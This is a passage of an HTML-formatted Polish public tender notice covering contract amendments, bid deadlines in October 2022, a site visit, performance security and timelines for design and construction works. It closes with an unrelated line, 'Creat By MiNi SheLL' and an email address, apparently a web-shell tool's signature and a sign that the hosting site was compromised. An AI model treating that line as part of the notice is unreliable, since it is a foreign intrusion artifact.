w przypadku, gdy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty/usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 3 do SWZ. <br/>3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych<br/>w PPU, stanowiących Załącznik nr 4 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>Zgodnie z par. 13 PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę wraz z załącznikami należy złożyć za pośrednictwem „Formularza do złożenia oferty” dostępnego na Platformie zakupowej pod adresem: https://platformazakupowa.pl/pn/zkzl_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wizja lokalna:<br/>Zamawiający dopuszcza możliwość odbycia przez Wykonawcę wizji lokalnej. <br/>Termin i zasady udziału w wizji lokalnej: Zamawiający wyznaczy termin wizji lokalnej na wniosek Wykonawcy. W wizji lokalnej mogą uczestniczyć wszyscy zainteresowani, potencjalni Wykonawcy. O terminie wizji lokalnej Zamawiający poinformuje Wykonawców za pośrednictwem strony prowadzonego postępowania.<br/>2.Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie brutto osobno dla każdej z części (z podatkiem VAT).<br/>3.Wykonawca zobowiązany jest do wykonania przedmiotu Umowy w terminie:<br/>1)	w zakresie wykonania Dokumentacji oraz uzyskania statecznego zgłoszenia rozpoczęcia robót budowlanych lub ostatecznej decyzji o pozwoleniu na budowę:<br/>a)	45 dni na opracowanie Projektu technicznego, w tym na przygotowanie STWiOR, BIOZ, Przedmiaru robót oraz Szczegółowego Kosztorysu Wykonawczego, licząc od dnia podpisania przez Zamawiającego protokołu kwalifikacji Projektu zagospodarowania terenu oraz Projektu architektoniczno – budowlanego z adnotacją „bez zastrzeżeń”, z zastrzeżeniem, iż złożenie Zamawiającemu tej części Dokumentacji powinno nastąpić nie później niż 7 dni przed upływem tego terminu,<br/>b)	45 dni na uzyskanie zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych, licząc od dnia podpisania protokołu kwalifikacji Projektu technicznego z adnotacją „bez zastrzeżeń”,<br/>2)	pełnienia Nadzoru autorskiego – od dnia protokolarnego przekazania terenu robót do dnia podpisania Protokołu Odbioru Końcowego Robót,<br/>3)	90 dni na wykonanie robót oraz sporządzenie dokumentacji powykonawczej, licząc od dnia protokolarnego przekazania terenu robót, z zastrzeżeniem, że termin na zgłoszenie Zamawiającemu gotowości do końcowego odbioru robót i przekazanie Dokumentacji Powykonawczej winno nastąpić nie później niż 7 dni przed upływem tego terminu.<br/>4) Protokolarne przekazanie terenu robót nastąpi w terminie wyznaczonym przez Zamawiającego, niezwłocznie po sporządzeniu Dokumentacji i uzyskaniu zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych (nie później jednak niż 30 dni od tych zdarzeń).

Creat By MiNi SheLL
Email: jattceo@gmail.com